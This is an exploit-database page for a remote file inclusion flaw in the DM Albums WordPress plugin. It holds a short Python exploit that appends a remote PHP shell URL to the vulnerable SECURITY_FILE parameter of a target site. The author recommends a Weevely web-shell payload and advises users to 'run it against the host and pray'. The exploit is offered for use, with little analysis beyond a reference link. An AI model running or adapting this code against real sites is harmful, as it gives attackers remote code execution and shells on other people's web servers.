DM FileManager Remote File Inclusion

2012.10.02

Credit: infodox

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

#!/usr/bin/env python
# Title: DM FileManager security_file Remote File Inclusion Exploit
# CVE: ????-????
# Reference: http://secunia.com/advisories/35622/
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests
import sys

vulnurl = "/wp-content/plugins/dm-albums/template/album.php?" # Oh look, the vuln URL!
param = "SECURITY_FILE=" # the vuln paramater
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?

def banner():
    print """
DM FileManager "security_file" Remote File Inclusion Exploit.
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
    """ 

if len(sys.argv) != 4:
    banner()
    print "Usage: ./x2.py <target>"
    print "Where <target> is the vulnerable website."
    print "Example: ./x2.py http://lamesite.com"
    sys.exit(1)
    
banner()
target = sys.argv[1]
pwnme = target + vulnurl + param + payloadurl
print "[+] Running Exploit..."
requests.get(pwnme)
print "[?] Gotshell?"

References:

http://secunia.com/advisories/35622/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DM FileManager Remote File Inclusion

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.